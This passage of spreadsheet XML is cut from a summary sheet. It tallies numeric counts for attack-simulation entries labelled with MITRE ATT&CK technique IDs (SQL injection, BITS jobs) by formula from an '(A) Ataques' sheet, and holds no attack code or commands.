        <f>IF('(A) Ataques'!$AP42&lt;&gt;"NO",'(A) Ataques'!LM42,"")</f>
        <v>2</v>
      </c>
      <c r="BF42" s="471">
        <f>IF('(A) Ataques'!$AP42&lt;&gt;"NO",'(A) Ataques'!LN42,"")</f>
        <v>1</v>
      </c>
      <c r="BG42" s="471">
        <f>IF('(A) Ataques'!$AP42&lt;&gt;"NO",'(A) Ataques'!LO42,"")</f>
        <v>1</v>
      </c>
      <c r="BH42" s="471">
        <f>IF('(A) Ataques'!$AP42&lt;&gt;"NO",'(A) Ataques'!LS42,"")</f>
        <v>1</v>
      </c>
      <c r="BI42" s="331">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",IF($BD42=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ42" s="469">
        <f>'(A) Ataques'!OL42+'(A) Ataques'!OR42+'(A) Ataques'!OX42+'(A) Ataques'!PD42+'(A) Ataques'!PJ42</f>
        <v>0</v>
      </c>
      <c r="BK42" s="510">
        <f>'(A) Ataques'!ON42+'(A) Ataques'!OT42+'(A) Ataques'!OZ42+'(A) Ataques'!PF42+'(A) Ataques'!PL42</f>
        <v>0</v>
      </c>
      <c r="BL42" s="471">
        <f>'(A) Ataques'!OP42+'(A) Ataques'!OV42+'(A) Ataques'!PB42+'(A) Ataques'!PH42+'(A) Ataques'!PN42</f>
        <v>0</v>
      </c>
      <c r="BM42" s="495">
        <f>'(A) Ataques'!OH42</f>
        <v>0</v>
      </c>
      <c r="BN42" s="331">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",IF($BJ42=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BO42" s="469">
        <f>IF('(A) Ataques'!$AP42&lt;&gt;"NO",'(A) Ataques'!OC42,"")</f>
        <v>0</v>
      </c>
      <c r="BP42" s="510">
        <f>IF('(A) Ataques'!$AP42&lt;&gt;"NO",'(A) Ataques'!OD42,"")</f>
        <v>0</v>
      </c>
      <c r="BQ42" s="471">
        <f>IF('(A) Ataques'!$AP42&lt;&gt;"NO",'(A) Ataques'!OE42,"")</f>
        <v>0</v>
      </c>
      <c r="BR42" s="471">
        <f>IF('(A) Ataques'!$AP42&lt;&gt;"NO",'(A) Ataques'!OF42,"")</f>
        <v>0</v>
      </c>
      <c r="BS42" s="471">
        <f>IF('(A) Ataques'!$AP42&lt;&gt;"NO",'(A) Ataques'!OJ42,"")</f>
        <v>0</v>
      </c>
      <c r="BT42" s="331">
        <f>IF('(A) Ataques'!$AK42&lt;&gt;"NO",IF($BO42=0,0,1),"")</f>
        <v>0</v>
      </c>
    </row>
    <row r="43" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A43" s="79">
        <f t="shared" si="0"/>
        <v>41</v>
      </c>
      <c r="B43" s="4">
        <f>IF('(A) Ataques'!AK43&lt;&gt;"NO",'(A) Ataques'!E43,"")</f>
        <v>32</v>
      </c>
      <c r="C43" s="6" t="str">
        <f>IF('(A) Ataques'!AK43&lt;&gt;"NO",IF('(A) Ataques'!M43="","",'(A) Ataques'!M43),"")</f>
        <v>T1190-SQL_Injection_High_Bytes2</v>
      </c>
      <c r="D43" s="4" t="str">
        <f>IF('(A) Ataques'!AK43&lt;&gt;"NO",'(A) Ataques'!F43,"")</f>
        <v>T1190</v>
      </c>
      <c r="E43" s="286">
        <f>IF('(A) Ataques'!AK43&lt;&gt;"NO",'(A) Ataques'!AQ43,"")</f>
        <v>1</v>
      </c>
      <c r="F43" s="288">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",'(A) Ataques'!BB43,"")</f>
        <v>2</v>
      </c>
      <c r="G43" s="392">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",'(A) Ataques'!BD43,"")</f>
        <v>2</v>
      </c>
      <c r="H43" s="4">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",'(A) Ataques'!BF43,"")</f>
        <v>2</v>
      </c>
      <c r="I43" s="20">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",'(A) Ataques'!BG43,"")</f>
        <v>1</v>
      </c>
      <c r="J43" s="530">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",IF($F43=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K43" s="322">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",'(A) Ataques'!$BH43,"")</f>
        <v>2</v>
      </c>
      <c r="L43" s="322">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",'(A) Ataques'!$BJ43,"")</f>
        <v>2</v>
      </c>
      <c r="M43" s="4">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",'(A) Ataques'!$BL43,"")</f>
        <v>2</v>
      </c>
      <c r="N43" s="20">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",'(A) Ataques'!$BM43,"")</f>
        <v>1</v>
      </c>
      <c r="O43" s="532">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",IF($K43=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P43" s="292">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",'(A) Ataques'!$BN43,"")</f>
        <v>4</v>
      </c>
      <c r="Q43" s="322">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",'(A) Ataques'!$BP43,"")</f>
        <v>4</v>
      </c>
      <c r="R43" s="4">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",'(A) Ataques'!$BR43,"")</f>
        <v>4</v>
      </c>
      <c r="S43" s="20">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",'(A) Ataques'!$BS43,"")</f>
        <v>1</v>
      </c>
      <c r="T43" s="530">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",IF($P43=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U43" s="322">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",'(A) Ataques'!$BT43,"")</f>
        <v>7</v>
      </c>
      <c r="V43" s="322">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",'(A) Ataques'!$BV43,"")</f>
        <v>7</v>
      </c>
      <c r="W43" s="4">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",'(A) Ataques'!$BX43,"")</f>
        <v>7</v>
      </c>
      <c r="X43" s="20">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",'(A) Ataques'!$BY43,"")</f>
        <v>1</v>
      </c>
      <c r="Y43" s="532">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",IF($U43=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z43" s="288">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",'(A) Ataques'!BZ43,"")</f>
        <v>8</v>
      </c>
      <c r="AA43" s="392">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",'(A) Ataques'!CB43,"")</f>
        <v>5</v>
      </c>
      <c r="AB43" s="4">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",'(A) Ataques'!CD43,"")</f>
        <v>5</v>
      </c>
      <c r="AC43" s="20">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",'(A) Ataques'!CE43,"")</f>
        <v>1</v>
      </c>
      <c r="AD43" s="331">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",IF(Z43=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE43" s="322">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",'(A) Ataques'!$CF43,"")</f>
        <v>14</v>
      </c>
      <c r="AF43" s="322">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",'(A) Ataques'!$CH43,"")</f>
        <v>12</v>
      </c>
      <c r="AG43" s="4">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",'(A) Ataques'!$CJ43,"")</f>
        <v>12</v>
      </c>
      <c r="AH43" s="20">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",'(A) Ataques'!$CK43,"")</f>
        <v>1</v>
      </c>
      <c r="AI43" s="287">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",IF($AE43=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ43" s="292">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",'(A) Ataques'!$CL43,"")</f>
        <v>0</v>
      </c>
      <c r="AK43" s="322">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",'(A) Ataques'!$CN43,"")</f>
        <v>0</v>
      </c>
      <c r="AL43" s="4">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",'(A) Ataques'!$CP43,"")</f>
        <v>0</v>
      </c>
      <c r="AM43" s="20">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",'(A) Ataques'!$CQ43,"")</f>
        <v>0</v>
      </c>
      <c r="AN43" s="331">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",IF($AJ43=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO43" s="322">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",'(A) Ataques'!$CR43,"")</f>
        <v>1</v>
      </c>
      <c r="AP43" s="322">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",'(A) Ataques'!$CT43,"")</f>
        <v>1</v>
      </c>
      <c r="AQ43" s="4">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",'(A) Ataques'!$CV43,"")</f>
        <v>1</v>
      </c>
      <c r="AR43" s="20">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",'(A) Ataques'!$CW43,"")</f>
        <v>1</v>
      </c>
      <c r="AS43" s="287">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",IF($AO43=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT43" s="288">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",'(A) Ataques'!CX43,"")</f>
        <v>5</v>
      </c>
      <c r="AU43" s="392">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",'(A) Ataques'!CZ43,"")</f>
        <v>5</v>
      </c>
      <c r="AV43" s="4">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",'(A) Ataques'!DB43,"")</f>
        <v>5</v>
      </c>
      <c r="AW43" s="20">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",'(A) Ataques'!DC43,"")</f>
        <v>1</v>
      </c>
      <c r="AX43" s="331">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",IF($AT43=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY43" s="469">
        <f>'(A) Ataques'!LU43+'(A) Ataques'!MA43+'(A) Ataques'!MG43+'(A) Ataques'!MM43+'(A) Ataques'!MS43</f>
        <v>1</v>
      </c>
      <c r="AZ43" s="510">
        <f>'(A) Ataques'!LW43+'(A) Ataques'!MC43+'(A) Ataques'!MI43+'(A) Ataques'!MO43+'(A) Ataques'!MU43</f>
        <v>1</v>
      </c>
      <c r="BA43" s="471">
        <f>'(A) Ataques'!LY43+'(A) Ataques'!ME43+'(A) Ataques'!MK43+'(A) Ataques'!MQ43+'(A) Ataques'!MW43</f>
        <v>1</v>
      </c>
      <c r="BB43" s="471">
        <f>'(A) Ataques'!LQ43</f>
        <v>1</v>
      </c>
      <c r="BC43" s="331">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",IF($AY43=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD43" s="469">
        <f>IF('(A) Ataques'!$AP43&lt;&gt;"NO",'(A) Ataques'!LL43,"")</f>
        <v>2</v>
      </c>
      <c r="BE43" s="510">
        <f>IF('(A) Ataques'!$AP43&lt;&gt;"NO",'(A) Ataques'!LM43,"")</f>
        <v>2</v>
      </c>
      <c r="BF43" s="471">
        <f>IF('(A) Ataques'!$AP43&lt;&gt;"NO",'(A) Ataques'!LN43,"")</f>
        <v>1</v>
      </c>
      <c r="BG43" s="471">
        <f>IF('(A) Ataques'!$AP43&lt;&gt;"NO",'(A) Ataques'!LO43,"")</f>
        <v>1</v>
      </c>
      <c r="BH43" s="471">
        <f>IF('(A) Ataques'!$AP43&lt;&gt;"NO",'(A) Ataques'!LS43,"")</f>
        <v>1</v>
      </c>
      <c r="BI43" s="331">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",IF($BD43=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ43" s="469">
        <f>'(A) Ataques'!OL43+'(A) Ataques'!OR43+'(A) Ataques'!OX43+'(A) Ataques'!PD43+'(A) Ataques'!PJ43</f>
        <v>0</v>
      </c>
      <c r="BK43" s="510">
        <f>'(A) Ataques'!ON43+'(A) Ataques'!OT43+'(A) Ataques'!OZ43+'(A) Ataques'!PF43+'(A) Ataques'!PL43</f>
        <v>0</v>
      </c>
      <c r="BL43" s="471">
        <f>'(A) Ataques'!OP43+'(A) Ataques'!OV43+'(A) Ataques'!PB43+'(A) Ataques'!PH43+'(A) Ataques'!PN43</f>
        <v>0</v>
      </c>
      <c r="BM43" s="495">
        <f>'(A) Ataques'!OH43</f>
        <v>0</v>
      </c>
      <c r="BN43" s="331">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",IF($BJ43=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BO43" s="469">
        <f>IF('(A) Ataques'!$AP43&lt;&gt;"NO",'(A) Ataques'!OC43,"")</f>
        <v>0</v>
      </c>
      <c r="BP43" s="510">
        <f>IF('(A) Ataques'!$AP43&lt;&gt;"NO",'(A) Ataques'!OD43,"")</f>
        <v>0</v>
      </c>
      <c r="BQ43" s="471">
        <f>IF('(A) Ataques'!$AP43&lt;&gt;"NO",'(A) Ataques'!OE43,"")</f>
        <v>0</v>
      </c>
      <c r="BR43" s="471">
        <f>IF('(A) Ataques'!$AP43&lt;&gt;"NO",'(A) Ataques'!OF43,"")</f>
        <v>0</v>
      </c>
      <c r="BS43" s="471">
        <f>IF('(A) Ataques'!$AP43&lt;&gt;"NO",'(A) Ataques'!OJ43,"")</f>
        <v>0</v>
      </c>
      <c r="BT43" s="331">
        <f>IF('(A) Ataques'!$AK43&lt;&gt;"NO",IF($BO43=0,0,1),"")</f>
        <v>0</v>
      </c>
    </row>
    <row r="44" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A44" s="79">
        <f t="shared" si="0"/>
        <v>42</v>
      </c>
      <c r="B44" s="4">
        <f>IF('(A) Ataques'!AK44&lt;&gt;"NO",'(A) Ataques'!E44,"")</f>
        <v>32</v>
      </c>
      <c r="C44" s="6" t="str">
        <f>IF('(A) Ataques'!AK44&lt;&gt;"NO",IF('(A) Ataques'!M44="","",'(A) Ataques'!M44),"")</f>
        <v>T1190-Sql_inyection2</v>
      </c>
      <c r="D44" s="4" t="str">
        <f>IF('(A) Ataques'!AK44&lt;&gt;"NO",'(A) Ataques'!F44,"")</f>
        <v>T1190</v>
      </c>
      <c r="E44" s="286">
        <f>IF('(A) Ataques'!AK44&lt;&gt;"NO",'(A) Ataques'!AQ44,"")</f>
        <v>1</v>
      </c>
      <c r="F44" s="288">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",'(A) Ataques'!BB44,"")</f>
        <v>1</v>
      </c>
      <c r="G44" s="392">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",'(A) Ataques'!BD44,"")</f>
        <v>1</v>
      </c>
      <c r="H44" s="4">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",'(A) Ataques'!BF44,"")</f>
        <v>1</v>
      </c>
      <c r="I44" s="20">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",'(A) Ataques'!BG44,"")</f>
        <v>1</v>
      </c>
      <c r="J44" s="530">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",IF($F44=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K44" s="322">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",'(A) Ataques'!$BH44,"")</f>
        <v>143</v>
      </c>
      <c r="L44" s="322">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",'(A) Ataques'!$BJ44,"")</f>
        <v>143</v>
      </c>
      <c r="M44" s="4">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",'(A) Ataques'!$BL44,"")</f>
        <v>11</v>
      </c>
      <c r="N44" s="20">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",'(A) Ataques'!$BM44,"")</f>
        <v>73</v>
      </c>
      <c r="O44" s="532">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",IF($K44=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P44" s="292">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",'(A) Ataques'!$BN44,"")</f>
        <v>144</v>
      </c>
      <c r="Q44" s="322">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",'(A) Ataques'!$BP44,"")</f>
        <v>144</v>
      </c>
      <c r="R44" s="4">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",'(A) Ataques'!$BR44,"")</f>
        <v>12</v>
      </c>
      <c r="S44" s="20">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",'(A) Ataques'!$BS44,"")</f>
        <v>73</v>
      </c>
      <c r="T44" s="530">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",IF($P44=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U44" s="322">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",'(A) Ataques'!$BT44,"")</f>
        <v>255</v>
      </c>
      <c r="V44" s="322">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",'(A) Ataques'!$BV44,"")</f>
        <v>255</v>
      </c>
      <c r="W44" s="4">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",'(A) Ataques'!$BX44,"")</f>
        <v>11</v>
      </c>
      <c r="X44" s="20">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",'(A) Ataques'!$BY44,"")</f>
        <v>76</v>
      </c>
      <c r="Y44" s="532">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",IF($U44=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z44" s="288">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",'(A) Ataques'!BZ44,"")</f>
        <v>223</v>
      </c>
      <c r="AA44" s="392">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",'(A) Ataques'!CB44,"")</f>
        <v>220</v>
      </c>
      <c r="AB44" s="4">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",'(A) Ataques'!CD44,"")</f>
        <v>15</v>
      </c>
      <c r="AC44" s="20">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",'(A) Ataques'!CE44,"")</f>
        <v>75</v>
      </c>
      <c r="AD44" s="331">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",IF(Z44=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE44" s="322">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",'(A) Ataques'!$CF44,"")</f>
        <v>444</v>
      </c>
      <c r="AF44" s="322">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",'(A) Ataques'!$CH44,"")</f>
        <v>442</v>
      </c>
      <c r="AG44" s="4">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",'(A) Ataques'!$CJ44,"")</f>
        <v>24</v>
      </c>
      <c r="AH44" s="20">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",'(A) Ataques'!$CK44,"")</f>
        <v>76</v>
      </c>
      <c r="AI44" s="287">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",IF($AE44=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ44" s="292">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",'(A) Ataques'!$CL44,"")</f>
        <v>0</v>
      </c>
      <c r="AK44" s="322">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",'(A) Ataques'!$CN44,"")</f>
        <v>0</v>
      </c>
      <c r="AL44" s="4">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",'(A) Ataques'!$CP44,"")</f>
        <v>0</v>
      </c>
      <c r="AM44" s="20">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",'(A) Ataques'!$CQ44,"")</f>
        <v>0</v>
      </c>
      <c r="AN44" s="331">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",IF($AJ44=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO44" s="322">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",'(A) Ataques'!$CR44,"")</f>
        <v>3</v>
      </c>
      <c r="AP44" s="322">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",'(A) Ataques'!$CT44,"")</f>
        <v>3</v>
      </c>
      <c r="AQ44" s="4">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",'(A) Ataques'!$CV44,"")</f>
        <v>3</v>
      </c>
      <c r="AR44" s="20">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",'(A) Ataques'!$CW44,"")</f>
        <v>1</v>
      </c>
      <c r="AS44" s="287">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",IF($AO44=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT44" s="288">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",'(A) Ataques'!CX44,"")</f>
        <v>147</v>
      </c>
      <c r="AU44" s="392">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",'(A) Ataques'!CZ44,"")</f>
        <v>147</v>
      </c>
      <c r="AV44" s="4">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",'(A) Ataques'!DB44,"")</f>
        <v>15</v>
      </c>
      <c r="AW44" s="20">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",'(A) Ataques'!DC44,"")</f>
        <v>73</v>
      </c>
      <c r="AX44" s="331">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",IF($AT44=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY44" s="469">
        <f>'(A) Ataques'!LU44+'(A) Ataques'!MA44+'(A) Ataques'!MG44+'(A) Ataques'!MM44+'(A) Ataques'!MS44</f>
        <v>150</v>
      </c>
      <c r="AZ44" s="510">
        <f>'(A) Ataques'!LW44+'(A) Ataques'!MC44+'(A) Ataques'!MI44+'(A) Ataques'!MO44+'(A) Ataques'!MU44</f>
        <v>138</v>
      </c>
      <c r="BA44" s="471">
        <f>'(A) Ataques'!LY44+'(A) Ataques'!ME44+'(A) Ataques'!MK44+'(A) Ataques'!MQ44+'(A) Ataques'!MW44</f>
        <v>2</v>
      </c>
      <c r="BB44" s="471">
        <f>'(A) Ataques'!LQ44</f>
        <v>76</v>
      </c>
      <c r="BC44" s="331">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",IF($AY44=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD44" s="469">
        <f>IF('(A) Ataques'!$AP44&lt;&gt;"NO",'(A) Ataques'!LL44,"")</f>
        <v>226</v>
      </c>
      <c r="BE44" s="510">
        <f>IF('(A) Ataques'!$AP44&lt;&gt;"NO",'(A) Ataques'!LM44,"")</f>
        <v>214</v>
      </c>
      <c r="BF44" s="471">
        <f>IF('(A) Ataques'!$AP44&lt;&gt;"NO",'(A) Ataques'!LN44,"")</f>
        <v>2</v>
      </c>
      <c r="BG44" s="471">
        <f>IF('(A) Ataques'!$AP44&lt;&gt;"NO",'(A) Ataques'!LO44,"")</f>
        <v>1</v>
      </c>
      <c r="BH44" s="471">
        <f>IF('(A) Ataques'!$AP44&lt;&gt;"NO",'(A) Ataques'!LS44,"")</f>
        <v>76</v>
      </c>
      <c r="BI44" s="331">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",IF($BD44=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ44" s="469">
        <f>'(A) Ataques'!OL44+'(A) Ataques'!OR44+'(A) Ataques'!OX44+'(A) Ataques'!PD44+'(A) Ataques'!PJ44</f>
        <v>112</v>
      </c>
      <c r="BK44" s="510">
        <f>'(A) Ataques'!ON44+'(A) Ataques'!OT44+'(A) Ataques'!OZ44+'(A) Ataques'!PF44+'(A) Ataques'!PL44</f>
        <v>112</v>
      </c>
      <c r="BL44" s="471">
        <f>'(A) Ataques'!OP44+'(A) Ataques'!OV44+'(A) Ataques'!PB44+'(A) Ataques'!PH44+'(A) Ataques'!PN44</f>
        <v>18</v>
      </c>
      <c r="BM44" s="495">
        <f>'(A) Ataques'!OH44</f>
        <v>76</v>
      </c>
      <c r="BN44" s="331">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",IF($BJ44=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO44" s="469">
        <f>IF('(A) Ataques'!$AP44&lt;&gt;"NO",'(A) Ataques'!OC44,"")</f>
        <v>112</v>
      </c>
      <c r="BP44" s="510">
        <f>IF('(A) Ataques'!$AP44&lt;&gt;"NO",'(A) Ataques'!OD44,"")</f>
        <v>112</v>
      </c>
      <c r="BQ44" s="471">
        <f>IF('(A) Ataques'!$AP44&lt;&gt;"NO",'(A) Ataques'!OE44,"")</f>
        <v>18</v>
      </c>
      <c r="BR44" s="471">
        <f>IF('(A) Ataques'!$AP44&lt;&gt;"NO",'(A) Ataques'!OF44,"")</f>
        <v>1</v>
      </c>
      <c r="BS44" s="471">
        <f>IF('(A) Ataques'!$AP44&lt;&gt;"NO",'(A) Ataques'!OJ44,"")</f>
        <v>76</v>
      </c>
      <c r="BT44" s="331">
        <f>IF('(A) Ataques'!$AK44&lt;&gt;"NO",IF($BO44=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="45" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A45" s="79">
        <f t="shared" si="0"/>
        <v>43</v>
      </c>
      <c r="B45" s="4">
        <f>IF('(A) Ataques'!AK45&lt;&gt;"NO",'(A) Ataques'!E45,"")</f>
        <v>33</v>
      </c>
      <c r="C45" s="6" t="str">
        <f>IF('(A) Ataques'!AK45&lt;&gt;"NO",IF('(A) Ataques'!M45="","",'(A) Ataques'!M45),"")</f>
        <v>T1197-BITS_Jobs</v>
      </c>
      <c r="D45" s="4" t="str">
        <f>IF('(A) Ataques'!AK45&lt;&gt;"NO",'(A) Ataques'!F45,"")</f>
        <v>T1197</v>
      </c>
      <c r="E45" s="286">
        <f>IF('(A) Ataques'!AK45&lt;&gt;"NO",'(A) Ataques'!AQ45,"")</f>
        <v>43</v>
      </c>
      <c r="F45" s="288">
        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",'(A) Ataques'!BB45,"")</f>
        <v>7</v>
      </c>
      <c r="G45" s="392">
        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",'(A) Ataques'!BD45,"")</f>
        <v>3</v>
      </c>
      <c r="H45" s="4">
        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",'(A) Ataques'!BF45,"")</f>
        <v>2</v>
      </c>
      <c r="I45" s="20">
        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",'(A) Ataques'!BG45,"")</f>
        <v>3</v>
      </c>
      <c r="J45" s="530">
        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",IF($F45=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K45" s="322">
        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",'(A) Ataques'!$BH45,"")</f>
        <v>38</v>
      </c>
      <c r="L45" s="322">
        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",'(A) Ataques'!$BJ45,"")</f>
        <v>32</v>
      </c>
      <c r="M45" s="4">
        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",'(A) Ataques'!$BL45,"")</f>
        <v>6</v>
      </c>
      <c r="N45" s="20">
        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",'(A) Ataques'!$BM45,"")</f>
        <v>10</v>
      </c>
      <c r="O45" s="532">
        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",IF($K45=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P45" s="292">
        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",'(A) Ataques'!$BN45,"")</f>
        <v>45</v>
      </c>
      <c r="Q45" s="322">
        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",'(A) Ataques'!$BP45,"")</f>
        <v>35</v>
      </c>
      <c r="R45" s="4">
        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",'(A) Ataques'!$BR45,"")</f>
        <v>8</v>
      </c>
      <c r="S45" s="20">
        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",'(A) Ataques'!$BS45,"")</f>
        <v>11</v>
      </c>
      <c r="T45" s="530">
        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",IF($P45=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U45" s="322">
        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",'(A) Ataques'!$BT45,"")</f>
        <v>53</v>
      </c>
      <c r="V45" s="322">
        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",'(A) Ataques'!$BV45,"")</f>
        <v>37</v>
      </c>
      <c r="W45" s="4">
        <f>IF('(A) Ataques'!$AK45&lt;&gt;"NO",'(A) Ataques'!$BX45,"")</f>
        <v>9</v>
      </c>
      <c r="X45" s="20">
